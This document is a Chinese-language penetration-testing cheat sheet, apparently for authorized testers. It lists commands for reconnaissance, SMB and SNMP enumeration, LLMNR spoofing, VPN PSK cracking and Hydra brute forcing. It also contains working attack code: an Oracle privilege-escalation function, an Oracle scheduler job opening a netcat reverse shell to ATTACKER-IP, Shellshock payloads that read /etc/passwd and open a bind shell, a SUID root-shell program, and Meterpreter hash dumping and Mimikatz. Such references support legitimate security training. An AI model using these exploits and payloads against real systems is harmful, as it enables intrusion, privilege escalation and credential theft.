渗透测试工具备忘录 - 详尽教学文档
1. 开始前的准备
1.1 网络配置
# 设置IP地址(ifconfig不接受CIDR写法,推荐使用iproute2)
ip addr add xxx.xxx.xxx.xxx/24 dev eth0
ifconfig eth0 xxx.xxx.xxx.xxx netmask 255.255.255.0
# 子网划分
ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0
1.2 公开来源情报收集
DNS查询
# WHOIS查询
whois domain-name-here.com
# 查询DNS IP
dig a domain-name-here.com @nameserver
# 查询MX记录
dig mx domain-name-here.com @nameserver
# 用DIG查询域传送
dig axfr domain-name-here.com @nameserver
DNS域传送
# Windows DNS域传送
nslookup
> set type=any
> ls -d blah.com
# Linux DNS域传送
dig axfr blah.com @ns1.blah.com
邮件枚举
git clone https://github.com/killswitch-GUI/SimplyEmail.git
./SimplyEmail.py -all -e TARGET-DOMAIN
2. 信息收集
2.1 基本指纹识别
# 通过显示banner识别版本和指纹
nc -v 192.168.1.1 25
telnet 192.168.1.1 25
# 使用NC抓取banner
nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referer: meh-domain
<enter>
2.2 DNS爆破
# DNSRecon DNS枚举
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml
2.3 端口扫描
Nmap基本命令
nmap -v -sS -A -T4 target # 详细显示,syn探测,高速扫描,系统和服务版本信息,脚本扫描和路由跟踪
nmap -v -sS -p- -A -T4 target # 同上,且扫描所有TCP端口,耗时更长
nmap -v -sU -sS -p- -A -T4 target # 同上,且扫描所有UDP端口,耗时巨长
Nmap特殊扫描
# 扫描SMB已知漏洞(smb-check-vulns已从新版Nmap中移除,改用smb-vuln-*系列脚本)
nmap -v -p 445 --script=smb-vuln-* 192.168.1.X
# 旧版Nmap写法: --script-args=unsafe=1 会执行可能导致目标服务崩溃的检测,仅在授权范围内使用
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X
# 搜索nmap脚本
ls /usr/share/nmap/scripts/* | grep ftp
UDP扫描
nmap -sU TARGET # UDP协议扫描
# 使用专用UDP扫描器
git clone https://github.com/portcullislabs/udp-proto-scanner.git
./udp-proto-scanner.pl -f ip.txt # 扫描文件中IP地址的所有UDP服务
./udp-proto-scanner.pl -p ntp -f ips.txt # 扫描特定UDP服务(脚本文件名为udp-proto-scanner.pl)
2.4 其他主机发现方法
netdiscover -r 192.168.1.0/24 # 利用ARP发现同网段的IP,MAC地址和MAC厂商
3. 枚举和攻击网络服务
3.1 SMB/Samba枚举
# SMB枚举工具
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
# 寻找开放的SMB共享
smbclient -L //192.168.1.100
# 枚举SMB共享
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24
# 枚举SMB用户
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
# RID循环(RID Cycling)
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
手动测试空会话
# Windows:
net use \\TARGET\IPC$ "" /u:""
# Linux:
smbclient -L //192.168.99.131
NBTScan
apt-get install nbtscan-unixwiz
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan
3.2 LLMNR/NBT-NS欺骗
使用Metasploit
# LLMNR/NetBIOS请求欺骗/毒化
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
# 抓取哈希
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
使用Responder
git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0
3.3 SNMP枚举
SNMP工具
# 美化SNMP输出
apt-get install snmp-mibs-downloader
download-mibs
echo "" > /etc/snmp/snmp.conf
# SNMP枚举命令
snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d" " -f4 # 列出运行中的进程名
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts
SNMPv3枚举
# 识别SNMPv3服务器
nmap -sV -p 161 --script=snmp-info TARGET-SUBNET
# 安装工具
apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
3.4 远程服务枚举
RSH枚举
# RSH运行命令
rsh <target> <command>
# RSH登陆扫描
auxiliary/scanner/rservices/rsh_login
# 使用rusers显示已登陆用户
rusers -al 192.168.2.1
# 使用rlogin以指定用户登录目标(需逐个主机尝试)
rlogin -l <user> <target>
Finger枚举
finger @TARGET-IP
finger batman@TARGET-IP
3.5 TLS/SSL测试
# 测试单一主机并将结果输出为HTML文件(需要安装aha)
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html
4. 漏洞评估
4.1 OpenVAS安装
apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup
检查OpenVAS运行状态:
netstat -tulpn
通过 https://127.0.0.1:9392 登陆openvas
5. 数据库渗透测试
5.1 Oracle测试
安装工具
apt-get install oscanner tnscmd10g
识别Oracle服务
# Oracle TNS版本指纹识别(监听器默认端口1521)
tnscmd10g version -h TARGET
nmap -p 1521 --script=oracle-tns-version TARGET
# 爆破Oracle SID和账户(oracle-brute需要先通过oracle-sid-brute或其他方式获得SID)
nmap -p 1521 --script=oracle-sid-brute TARGET
nmap -p 1521 --script=oracle-brute --script-args oracle-brute.sid=SID TARGET
Oracle权限提升
- 使用NMAP NSE脚本验证oracle数据库中的默认账户
- 使用脆弱账号登陆
- 确认oracle用户的权限级别
select * from session_privs;
- 创建提权函数(authid current_user + autonomous_transaction,使函数在被SYS拥有的索引调用时以高权限执行grant)
CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid current_user is pragma autonomous_transaction; begin execute immediate 'grant dba to user1 identified by pass1';commit;return 'FOO';end;
- 创建索引触发函数
create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
- 验证权限
Select * from session_privs;
- 清除痕迹(注意:仅删除索引不会移除上面创建的GETDBA函数和user1账户,测试结束后需一并处理)
drop index exploit_1337;
drop function GETDBA;
获取Oracle反弹shell
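-- Create and immediately enable a DBMS_SCHEDULER external job that runs
-- "/bin/nc ATTACKER-IP 443 -e /bin/bash" on the database host.
-- Prerequisites: CREATE JOB / CREATE EXTERNAL JOB privileges and a working
-- external-job agent; the OS user the job runs as depends on server config.
-- NOTE: the original listing created the job as 'MEH1337' but then set the
-- arguments on 'rev_shell', so nothing ran -- the name must be the same everywhere.
begin
  dbms_scheduler.create_job(
    job_name            => 'rev_shell',
    job_type            => 'EXECUTABLE',
    job_action          => '/bin/nc',
    number_of_arguments => 4,
    start_date          => SYSTIMESTAMP,
    enabled             => FALSE,   -- enable only after the arguments are set
    auto_drop           => TRUE);
  -- Arguments are positional: the first is the listener (attacker) address,
  -- not the target. '-e' needs a netcat build that supports it (nc.traditional);
  -- the OpenBSD netcat shipped on many systems does not.
  dbms_scheduler.set_job_argument_value('rev_shell', 1, 'ATTACKER-IP');
  dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
  dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
  dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
  dbms_scheduler.enable('rev_shell');
end;
/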
5.2 MSSQL测试
枚举/发现
nmap -sU -p 1434 --script=ms-sql-info 192.168.1.108 192.168.1.156 # 通过SQL Browser服务(UDP 1434)发现实例
Metasploit模块
use auxiliary/scanner/mssql/mssql_ping
use auxiliary/admin/mssql/mssql_enum
Metasploit获取Shell
use exploit/windows/mssql/mssql_payload
set PAYLOAD windows/meterpreter/reverse_tcp
6. 网络隧道与跳板
6.1 Plink.exe隧道
# 反向端口转发:在REMOTE-IP上监听445并转发到本地127.0.0.1:445(密码出现在命令行中会被进程列表/历史记录记录,建议改用密钥)
plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP
6.2 SSH跳板
# 一级跳板
ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip
# 在/etc/proxychains.conf添加
socks4 127.0.0.1 1010
# 二级跳板
proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2
# 在/etc/proxychains.conf添加
socks4 127.0.0.1 1011
6.3 Meterpreter跳板
portfwd add -l 3389 -p 3389 -r target # 端口转发(本地3389 -> target:3389)
portfwd delete -l 3389 -p 3389 -r target # 删除端口转发
7. 网络基础知识
7.1 TTL指纹识别
| 操作系统 |
TTL值 |
| Windows |
128 |
| Linux |
64 |
| Solaris |
255 |
| Cisco/Network |
255 |
7.2 IPv4速查
各类IP地址范围
| 类别 |
IP地址范围 |
| A类 |
0.0.0.0 - 127.255.255.255 |
| B类 |
128.0.0.0 - 191.255.255.255 |
| C类 |
192.0.0.0 - 223.255.255.255 |
| D类 |
224.0.0.0 - 239.255.255.255 |
| E类 |
240.0.0.0 - 255.255.255.255 |
IPv4私有地址
| 类别 |
范围 |
| A类私有地址 |
10.0.0.0 - 10.255.255.255 |
| B类私有地址 |
172.16.0.0 - 172.31.255.255 |
| C类私有地址 |
192.168.0.0 - 192.168.255.255 |
7.3 IPv4子网速查表
| CIDR |
十进制掩码 |
主机数量 |
| /31 |
255.255.255.254 |
2 Hosts (点对点链路, RFC 3021; 按传统网络/广播地址计算则为0) |
| /30 |
255.255.255.252 |
2 Hosts |
| ... |
... |
... |
| /24 |
255.255.255.0 |
254 Hosts |
| ... |
... |
... |
| /8 |
255.0.0.0 |
16777214 Hosts |
8. 高级攻击技术
8.1 VLAN跳跃攻击
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh
8.2 VPN测试
识别VPN服务器
./udp-protocol-scanner.pl -p ike TARGET(s)
./udp-protocol-scanner.pl -p ike -f ip.txt
IKEForce工具
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
# 枚举VPN组名(IKE激进模式)
./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic
# 爆破VPN
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
IKE扫描
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
IKE激进模式PSK破解流程
- 验证IKE服务器
./udp-protocol-scanner.pl -p ike SUBNET/24
- 枚举组名
./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic
- 抓取PSK哈希(激进模式会在认证前返回可离线破解的哈希)
ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP
- 破解PSK哈希
psk-crack hash-file.txt
# 高级选项(-b 为暴力破解最大长度)
psk-crack -b 5 TARGET-IP-key
psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
8.3 PPTP攻击
# 验证PPTP服务
nmap -Pn -sV -p 1723 TARGET(S)
# PPTP字典攻击
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
8.4 DNS隧道
攻击机器设置
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
# 运行dnscat2
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
目标机器
dnscat --host <dnscat server_ip>
9. 漏洞利用
9.1 Exploit搜索
# 从exploit-db搜索
searchsploit windows 2003 | grep -i local
# Google搜索
site:exploit-db.com exploit kernel <= 3
# 搜索metasploit模块
grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/* # 目录名为exploits
# 本地exploit-db搜索
searchsploit -u # 更新本地exploit-db副本
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
9.2 交叉编译Exploits
在Kali上编译Windows的exp
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip # 第三方非签名二进制,通过明文HTTP下载,使用前自行核验;更稳妥的做法是 apt install mingw-w64 后用 i686-w64-mingw32-gcc 交叉编译
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
通用交叉编译
gcc -m32 -o output32 hello.c # 32位
gcc -m64 -o output hello.c # 64位
9.3 利用Shellshock漏洞
git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
# 查看文件内容(Shellshock触发需要函数定义前缀 "() { :;};",之后的内容才会被bash执行)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
# 运行bind shell(需要支持-e的netcat)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
# 反弹shell:在攻击机上监听,并把上面的payload改为向攻击机发起连接
nc -l -p 443
10. 实用工具与技巧
10.1 本地Web服务器
python -m SimpleHTTPServer 80 # Python2
python3 -m http.server # Python3
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start" # Ruby
php -S 0.0.0.0:80 # PHP
10.2 挂载文件共享
# 挂载NFS共享
mount 192.168.1.1:/vol/share /mnt/nfs
# 挂载Windows共享(密码写在命令行会留在shell历史和进程列表中,建议改用 -o credentials=/path/to/file)
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
# Windows挂载共享
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
# 安装smb4k
apt-get install smb4k -y
10.3 HTTP/HTTPS Web服务枚举
nikto -h 192.168.1.1 # 对目标使用nikto进行扫描
dirbuster # 使用GUI配置
10.4 数据包侦测
tcpdump -i eth0 -w output.pcap tcp port 80 # 将网卡eth0的80端口流量写入output.pcap(选项必须放在过滤表达式之前)
10.5 用户名枚举
SMB用户枚举
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
SNMP用户枚举
snmpwalk -c public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX
nmap -sU -p 161 192.168.X.XXX/24 -oG snmp_results.txt # SNMP为UDP服务,然后grep结果
10.6 密码字典
/usr/share/wordlists # Kali的字典存放路径
11. 密码破解
11.1 Hydra爆破
爆破FTP
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V
爆破POP3
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V
爆破SMTP
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V
11.2 John The Ripper (JTR)
john --wordlist=/usr/share/wordlists/rockyou.txt hashes # 使用字典破解
john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt # 指定哈希类型
john --format=descrypt hash --show # 显示破解结果
12. Linux渗透测试技巧
12.1 SUID二进制
C代码示例
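// SUID helper that spawns /bin/bash as root.
// Build, then: chown root:root suid && chmod 4755 suid
int main(void){
    // Set real, effective and saved uid to 0. If this fails (binary is not
    // SUID root) bail out instead of spawning a shell as the caller.
    if (setresuid(0, 0, 0) != 0) {
        return 1;
    }
    // All three uids are 0 now, so bash does not drop privileges.
    system("/bin/bash");
    return 0;
}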
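// SUID helper that spawns /bin/sh as root.
// Build, then: chown root:root suid && chmod 4755 suid
int main(void){
    // Bail out if we could not become root; otherwise the shell would
    // simply run as the invoking user.
    if (setresuid(0, 0, 0) != 0) {
        return 1;
    }
    system("/bin/sh");
    return 0;
}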
编译(编译后还需 chown root suid && chmod 4755 suid 才具有SUID效果)
gcc -o suid suid.c # 按当前系统架构编译
gcc -m32 -o suid suid.c # 在64位系统上编译32位二进制(目标为32位系统时)
12.2 TTY Shell技巧
python -c 'import pty;pty.spawn("/bin/bash")' # Python
os.system('/bin/bash') # 在Python交互解释器中(需先 import os)
/bin/sh -i # sh交互式
perl -e 'exec "/bin/sh";' # Perl
exec "/bin/sh" # Ruby
os.execute('/bin/sh') # Lua
:!bash # 从Vi
!sh # NMAP
13. Metasploit速查表
13.1 Meterpreter Payloads
set payload windows/meterpreter/reverse_tcp # Windows反向tcp
set payload windows/vncinject/reverse_tcp # Windows VNC
set ViewOnly false # VNC可交互
set payload linux/meterpreter/reverse_tcp # Linux反向
13.2 Meterpreter命令
upload file c:\\windows # 上传文件
download c:\\windows\\repair\\sam /tmp # 下载文件
execute -f c:\\windows\temp\exploit.exe # 执行文件
execute -f cmd -c # 创建新cmd shell
ps # 显示进程
shell # 获取目标shell
getsystem # 尝试提权
hashdump # 导出哈希
13.3 常用Metasploit模块
远程Windows漏洞
use exploit/windows/smb/ms08_067_netapi # MS08_067 Windows 2k, XP, 2003
use exploit/windows/smb/ms06_040_netapi # MS06_040 Windows NT, 2k, XP, 2003
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index # MS09_050 Windows Vista SP1/SP2和Server 2008
本地Windows漏洞
use exploit/windows/local/bypassuac # 绕过Windows 7 UAC
辅助模块
use auxiliary/scanner/http/dir_scanner # HTTP目录扫描
use auxiliary/scanner/http/jboss_vulnscan # JBOSS漏扫
use auxiliary/scanner/mssql/mssql_login # MSSQL认证扫描
use auxiliary/scanner/mysql/mysql_version # MySQL版本扫描
use auxiliary/scanner/oracle/oracle_login # Oracle登陆
Powershell模块
use exploit/multi/script/web_delivery # powershell payload传送
use post/windows/manage/powershell/exec_powershell # 上传执行powershell脚本
use exploit/multi/http/jboss_maindeployer # JBOSS部署
use exploit/windows/mssql/mssql_payload # MSSQL payload
Windows后渗透模块
run post/windows/gather/win_privs # 显示当前用户权限
use post/windows/gather/credentials/gpp # 提取GPP保存的密码
load mimikatz -> wdigest # 加载Mimikatz
run post/windows/gather/local_admin_search_enum # 检查域内管理员权限
run post/windows/gather/smart_hashdump # 自动化导出sam文件
14. SQLMap示例
# 自动化扫描(--risk=3 会使用可能修改数据的payload,例如OR型注入和UPDATE语句,仅在授权且有备份的前提下使用)
sqlmap -u meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
# 指定目标扫描
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"
# 使用联合查询技术扫描mysql
sqlmap -u "meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
# 检测表单注入点
sqlmap -o -u "meh.com/form/" --forms
# 导出指定数据库表
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump
15. ASCII表速查
| ASCII字符 |
描述 |
| x00 |
Null Byte 空字节 |
| x08 |
BS 退格 |
| x09 |
TAB 水平制表符 |
| x0a |
LF 换行 |
| x0d |
CR 回车 |
| x20 |
SPC 空格 |
| ... |
... |
16. Cisco IOS命令
enable # 进入使能模式
conf t # 配置终端
(config)# interface fa0/0 # 配置FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 # 添加IP到fa0/0
(config-if)# line vty